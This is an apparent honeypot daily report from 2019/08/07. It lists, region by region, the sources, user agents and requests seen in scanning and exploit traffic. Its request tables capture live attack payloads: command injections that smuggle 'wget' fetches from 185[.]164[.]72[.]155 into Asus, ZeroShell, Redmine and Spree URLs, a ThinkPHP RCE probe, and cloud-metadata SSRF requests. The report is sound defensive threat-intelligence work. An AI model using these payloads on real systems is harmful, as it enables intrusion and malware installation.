Honeypot (provisional) observation record for 2019/08/07.
Summary
Region: AP
The following were observed:
- Access targeting the ThinkPHP vulnerability
- Access targeting the Jira vulnerability (CVE-2019-11581)
- Scanning activity against phpMyAdmin
- Scanning activity using Jorgee
- Scanning activity using ZmEu
- Malicious traffic involving 112[.]124[.]42[.]80
Traffic with the User-Agent "AWS Security Scanner" was also observed.
Region: US
The following were observed:
- Access targeting the Asus RT56U router vulnerability (CVE-2013-5948)
- Access targeting the Jira vulnerability (CVE-2019-11581)
- Access targeting the Redmine SCM Repository vulnerability
- Access targeting the Spree Commerce (open-source e-commerce software) vulnerability
- Access targeting the ZeroShell/Linux vulnerability (CVE-2009-0545)
- Scanning activity against phpMyAdmin
- Scanning activity using ZmEu
- Malicious traffic involving 112[.]124[.]42[.]80
- Malicious traffic involving 123[.]125[.]114[.]144
Region: EU
The following were observed:
- Access targeting the Jira vulnerability (CVE-2019-11581)
- Scanning activity against phpMyAdmin
- Scanning activity using ZmEu
- Malicious traffic involving 3[.]9[.]135[.]182
- Malicious traffic involving 112[.]124[.]42[.]80
Traffic with the User-Agent "AWS Security Scanner" was also observed.
Other
Scanning against AWS environments may be taking place.
Access count trend
AP: total accesses: 143 (vs. previous day: +18)
US: total accesses: 28 (vs. previous day: +8)
EU: total accesses: 40 (vs. previous day: -3)
For convenience, plain "GET / HTTP/1.1" and "POST / HTTP/1.1" requests are excluded.
Region: AP
Source IP address list
Count | Source IP address | Country |
---|---|---|
4 | 113.125.44.65 | China |
2 | 114.115.181.47 | China |
1 | 123.57.242.94 | China |
2 | 128.14.133.58 | United States |
1 | 157.55.39.37 | United States |
1 | 165.22.28.110 | United States |
1 | 169.197.108.6 | Netherlands |
10 | 175.182.75.161 | Taiwan |
2 | 182.16.103.93 | Hong Kong |
6 | 195.154.86.34 | France |
1 | 198.108.67.112 | United States |
9 | 198.177.123.196 | United States |
5 | 2.224.132.78 | Italy |
1 | 39.106.227.80 | China |
2 | 45.252.248.236 | Vietnam |
2 | 5.188.210.101 | Russia |
20 | 52.25.147.204 | United States |
1 | 52.35.37.229 | United States |
3 | 54.255.201.28 | Singapore |
38 | 60.12.172.21 | China |
3 | 60.191.52.254 | China |
1 | 64.121.155.96 | United States |
9 | 69.255.234.170 | United States |
4 | 71.6.146.185 | United States |
9 | 80.195.148.174 | United Kingdom |
4 | 82.221.105.6 | Iceland |
1 | 89.248.174.52 | Netherlands |
User-Agent list
Count | UserAgent |
---|---|
14 | - |
15 | AWS Security Scanner |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
4 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
33 | Mozilla/5.0 Jorgee |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
2 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
5 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | python-requests/2.10.0 |
1 | python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2 |
42 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | GET | /db/ | HTTP/1.1 |
2 | GET | /echo.php | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | HTTP/1.1 | |
1 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http://example.com/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
10 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
4 | GET | /manager/html | HTTP/1.1 |
6 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
6 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /ncsi.txt | HTTP/1.1 |
6 | GET | /phpmyadmin/ | HTTP/1.1 |
3 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
8 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
6 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /pma/ | HTTP/1.1 |
3 | GET | /PMA/ | HTTP/1.1 |
8 | GET | /pma/scripts/setup.php | HTTP/1.1 |
3 | GET | /robots.txt | HTTP/1.1 |
3 | GET | /secure/ContactAdministrators!default.jspa | HTTP/1.1 |
2 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
8 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
2 | GET | /.well-known/security.txt | HTTP/1.1 |
3 | HEAD | /dbadmin/ | HTTP/1.1 |
3 | HEAD | /db/ | HTTP/1.1 |
3 | HEAD | / | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | HEAD | /images/ | HTTP/1.1 |
6 | HEAD | /phpmyadmin/ | HTTP/1.1 |
3 | HEAD | /pma/ | HTTP/1.1 |
3 | HEAD | /PMA/ | HTTP/1.1 |
1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
6 | \x16\x03\x01 |
Region: US
Source IP address list
Count | Source IP address | Country |
---|---|---|
1 | 111.224.249.151 | China |
1 | 123.145.17.95 | China |
1 | 123.158.48.119 | China |
1 | 124.235.138.168 | China |
1 | 124.235.138.41 | China |
1 | 124.235.138.62 | China |
1 | 169.197.108.38 | Netherlands |
1 | 182.200.7.114 | China |
3 | 195.154.86.34 | France |
1 | 198.108.67.112 | United States |
1 | 213.128.88.99 | Turkey |
1 | 218.58.38.222 | China |
1 | 27.224.137.60 | China |
2 | 46.105.234.11 | France |
2 | 47.95.224.246 | China |
1 | 52.35.37.229 | United States |
2 | 5.39.37.10 | France |
1 | 54.255.201.28 | Singapore |
1 | 54.39.209.227 | Canada |
1 | 58.248.202.31 | China |
1 | 60.191.52.254 | China |
1 | 60.208.165.146 | China |
1 | 89.248.174.52 | Netherlands |
User-Agent list
Count | UserAgent |
---|---|
7 | - |
1 | Mozilla/5.0 |
1 | Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36 |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
3 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2 |
3 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
1 | GET | /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192[.]168[.]1[.]1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | http://boxun.com/ | HTTP/1.1 |
1 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]ip[.]cn/ | HTTP/1.1 |
1 | GET | http://www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /repository/annotate?rev=wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /?search[send]=eval&search[send][]=Kernel.fork%20do%60wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /secure/ContactAdministrators!default.jspa | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
1 | POST | /cgi-bin/;wget http://185[.]164[.]72[.]155/richard; | |
1 | PROPFIND | / | HTTP/1.1 |
1 | \x16\x03\x01 |
Region: EU
Source IP address list
Count | Source IP address | Country |
---|---|---|
1 | 128.14.133.58 | United States |
3 | 195.154.86.34 | France |
1 | 213.128.88.99 | Turkey |
17 | 52.25.147.204 | United States |
1 | 54.255.201.28 | Singapore |
1 | 60.191.52.254 | China |
16 | 79.11.97.105 | Italy |
User-Agent list
Count | UserAgent |
---|---|
10 | - |
7 | AWS Security Scanner |
2 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
3 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
5 | CONNECT | 3[.]9[.]135[.]182:80 | HTTP/1.0 |
1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
1 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | http://example.com/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/ | HTTP/1.1 |
1 | GET | http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /secure/ContactAdministrators!default.jspa | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
5 | \x16\x03\x01 |